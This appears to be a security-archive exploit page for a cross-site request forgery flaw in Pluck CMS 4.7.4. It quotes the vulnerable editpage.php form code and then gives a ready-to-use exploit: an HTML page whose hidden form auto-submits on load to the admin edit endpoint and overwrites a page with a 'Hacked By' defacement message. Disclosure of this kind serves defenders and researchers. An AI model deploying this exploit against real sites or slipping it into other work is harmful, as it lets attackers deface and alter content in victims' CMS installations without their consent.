Pluck CMS 4.7.4 Cross Site Request Forgery

Pluck CMS 4.7.4 Cross Site Request Forgery: Posted Aug 11, 2017; Authored by Und3rgr0und, Ehsan Cod3r; Pluck CMS version 4.7.4 suffers from a cross site request forgery vulnerability.; tags | exploit, csrf; SHA-256 | 49f4ac3f2d05457707a143d5c21e77ac3ac4d068da5364ca96bf90dc3b045a9a; Download | Favorite | View

Pluck CMS 4.7.4 Cross Site Request Forgery

==============================================
# Exploit Title : pluck-cms vulnerability CSRF
# Reported Date : 8 - 10 - 2017
# Exploit Author : Ashiyane Digital Security Team
# CWE: CSRF - 352
# Tested On :  kali Linux
# Vendor Homepage :  https://www.pluck-cms.org/
# Software Link :  https://github.com/pluck-cms/pluck/releases
# Version : 4.7.4
==============================================

-----------------------------
vulnerability discovered by :

Ehsan Cod3r , Und3rgr0und

-----------------------------
vulnerability Path :

https://127.0.0.1/PluckCMS/data/inc/editpage.php
-----------------------------

vulnerability File:

editpage.php
-----------------------------

vulnerability Method :

_GET[]
-----------------------------

Vulnerability code :


<form name="page_form" method="post" action="">
<p>
<label class="kop2" for="title"><?php echo $lang['general']['title'];
?></label>
<input name="title" id="title" type="text" value="<?php if
(isset($_GET['page'])) echo $title; ?>" />
</p>
<p><a href="#" class="kop2" onclick="return kadabra('seo-name');"><?php
echo $lang['page']['seo_urls']; ?></a></p>
<div id="seo-name" style="display: none;">
<input name="seo_name" id="seo_name" type="text" value="<?php if
(isset($_GET['page'])) if (isset($seoname)) echo $seoname; else echo
$title; ?>" />
</div>

<label class="kop2" for="content-form"><?php echo
$lang['general']['contents']; ?></label>
<textarea class="<?php if (defined('WYSIWYG_TEXTAREA_CLASS')) echo
WYSIWYG_TEXTAREA_CLASS; ?>" name="content" id="content-form" cols="70"
rows="20"><?php if (isset($_GET['page'])) echo htmlspecialchars($content);
?></textarea>


<div class="menudiv" style="width: 588px; margin-<?php if (DIRECTION_RTL)
echo 'right'; else echo 'left'; ?>: 0;">
<p><a href="#" class="kop2" onclick="return kadabra('meta-options');"><?php
echo $lang['editmeta']['title']; ?></a></p>
<p class="kop4" style="margin-bottom: 5px;"><?php echo
$lang['editmeta']['descr']; ?></p>

<div id="meta-options" style="display: none;">
    <label for="description"><?php echo $lang['general']['description'];
?></label>
    <br />
    <textarea id="description" name="description" rows="2" cols="40"
class="white"><?php if (isset($description)) echo $description;
?></textarea>
    <br />

    <label for="keywords"><?php echo $lang['editmeta']['keywords'];
?></label>
    <br />
    <span class="kop4"><?php echo $lang['editmeta']['comma']; ?></span>
    <br />
    <textarea id="keywords" name="keywords" rows="1" cols="40"
class="white"><?php if (isset($keywords)) echo $keywords; ?></textarea>
</div>
</div>

<div class="menudiv" style="width: 588px; margin-<?php if (DIRECTION_RTL)
echo 'right'; else echo 'left'; ?>: 0;">
<p><a href="#" class="kop2" onclick="return
kadabra('other-options');"><?php echo $lang['general']['other_options'];
?></a></p>
<p class="kop4" style="margin-bottom: 5px;"><?php echo
$lang['page']['options']; ?></p>

<div id="other-options" style="display: block;">
    <table>
    <tr>
        <td><label for="hidden"><?php echo $lang['page']['in_menu'];
?></label><br /></td>
        <td><input type="checkbox" name="hidden" id="hidden" <?php if
(!isset($_GET['page']) || $hidden == 'no') echo'checked="checked"'; ?>
value="no" /></td>
    </tr>

    <tr>
        <td><label for="sub_page"><?php echo $lang['page']['sub_page'];
?></label></td>
        <td> <?php if (isset($_GET['page']))
show_subpage_select('sub_page', $_GET['page']); else
show_subpage_select('sub_page'); ?></td>
    </tr>

    <?php run_hook('admin_save_page_beforepost'); ?>
    </table>
</div>
</div>
<?php show_common_submits('?action=page', true); ?>
</form>

============================================================================

Exploit code :

<html>
<body onload="document.exploit.submit()">
<form name="exploit" method="post" action="
https://localhost/1/PluckCMS/admin.php?action=editpage">
<input type="hidden" name="title" value="Hacked By Ehsan Cod3r">
<input type="hidden" name="seo_name" value="">
<input type="hidden" name="content" value="<h1>Hacked By Ehsan Cod3r">
<input type="hidden" name="description" value="">
<input type="hidden" name="keywords" value="">
<input type="hidden" name="hidden" value="no">
<input type="hidden" name="sub_page" value="">
<input type="hidden" name="theme" value="default">
<input type="hidden" name="save_exit" value="Save+and+Exit">
</form>
</body>
</html>

Top Authors In Last 30 Days

Red Hat 300 files
Ubuntu 63 files
Debian 20 files
LiquidWorm 19 files
Apple 9 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files
nu11secur1ty 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,928)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,326)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,981)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

Pluck CMS 4.7.4 Cross Site Request Forgery

Pluck CMS 4.7.4 Cross Site Request Forgery

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Pluck CMS 4.7.4 Cross Site Request Forgery

Share This

Pluck CMS 4.7.4 Cross Site Request Forgery

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems